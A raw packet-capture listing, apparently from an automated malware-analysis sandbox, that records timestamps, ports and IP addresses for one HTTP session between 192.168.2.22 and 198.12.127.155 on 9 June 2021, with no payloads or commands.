Jun 9, 2021 08:04:58.170770884 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.170773983 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.170777082 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.170799971 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.170818090 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.170824051 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.170845032 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.170850992 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.170865059 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.170875072 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.170887947 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.170897961 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.170907974 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.170921087 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.170931101 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.170943022 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.170952082 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.170964956 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.170977116 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.170988083 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.170996904 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.171010971 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.171015978 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.171036005 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.171050072 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.171060085 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.171070099 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.171082020 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.171092987 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.171104908 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.171159029 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.171181917 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.171185017 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.171192884 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.171205044 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.171211958 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.171228886 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.171228886 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.171250105 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.171251059 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.171268940 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.171272993 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.171288967 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.171295881 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.171308994 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.171319008 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.171339989 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.171344995 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.171358109 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.171367884 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.171380997 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.171389103 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.171401978 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.171411991 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.171425104 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.171433926 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.171446085 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.171454906 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.171466112 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.171477079 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.171488047 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.171499968 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.171509981 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.171530962 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174323082 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174349070 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174371004 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174376965 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174392939 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174410105 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174417019 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174417973 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174420118 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174439907 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174458981 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174462080 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174470901 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174483061 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174494982 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174504042 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174511909 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174525976 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174535990 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174549103 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174550056 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174575090 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174585104 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174598932 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174608946 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174619913 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174637079 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174642086 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174653053 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174666882 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174678087 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174689054 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174706936 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174711943 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174722910 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174734116 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174736023 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174748898 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174758911 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174762964 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174781084 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174798012 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174803019 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174813032 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174825907 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174839973 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174846888 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174851894 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174868107 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174882889 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174890041 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174897909 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174911022 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174931049 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174937010 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174945116 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174958944 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174969912 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.174979925 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.174988985 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175000906 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175009966 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175023079 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175046921 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175075054 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175087929 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175096989 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175097942 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175100088 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175110102 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175132036 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175144911 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175169945 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175185919 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175193071 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175199986 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175218105 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175228119 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175240040 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175251007 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175263882 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175271988 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175286055 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175297022 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175311089 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175312042 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175335884 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175348997 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175359011 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175362110 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175381899 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175395966 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175409079 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175417900 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175431013 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175451994 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175455093 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175466061 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175477028 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175484896 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175503016 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175508976 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175528049 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175544977 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175549984 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175559998 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175573111 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175584078 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175596952 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175605059 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175617933 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175628901 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175641060 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175652027 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175664902 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175666094 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175689936 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175698042 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175713062 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175728083 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175735950 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175746918 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175760031 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175765991 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175785065 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175808907 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175821066 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175827026 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175829887 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175851107 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175853014 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175862074 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175879002 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175889015 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175901890 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175921917 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175924063 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175930977 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175946951 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175960064 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175968885 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.175972939 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.175992012 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176011086 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176016092 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176026106 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176039934 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176058054 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176069021 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176085949 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176091909 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176107883 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176115036 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176126957 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176140070 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176165104 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176165104 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176175117 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176188946 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176188946 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176213980 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176219940 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176237106 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176249027 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176258087 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176271915 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176281929 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176281929 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176305056 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176317930 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176331997 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176331997 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176357031 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176368952 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176379919 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176419973 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176419973 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176428080 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176444054 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176464081 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176466942 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176479101 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176492929 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176505089 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176517963 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176532030 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176541090 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176552057 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176563978 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176572084 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176587105 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176608086 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176609993 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176615953 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176635027 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176647902 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176656008 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176686049 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176711082 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176711082 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176714897 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176723003 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176734924 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176745892 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176759005 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176774025 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176781893 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.176784039 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.176820993 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.189677954 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.191067934 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303165913 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303215027 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303240061 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303261042 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303283930 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303304911 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303332090 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303354025 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303368092 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303375959 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303397894 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303404093 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303410053 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303414106 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303419113 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303426027 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303441048 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303442001 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303462029 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303481102 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303483009 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303489923 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303508043 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303518057 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303530931 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303544044 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303551912 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303563118 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303574085 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303577900 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303596973 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303610086 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303620100 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303622961 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303643942 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303663015 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303664923 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303674936 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303689957 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303692102 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303714991 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303729057 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303740025 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303749084 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303766012 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303772926 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303788900 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303796053 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303811073 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303821087 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303834915 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303837061 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303858042 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303868055 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303883076 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303884029 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303906918 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303919077 CEST	49167	80	192.168.2.22	198.12.127.155
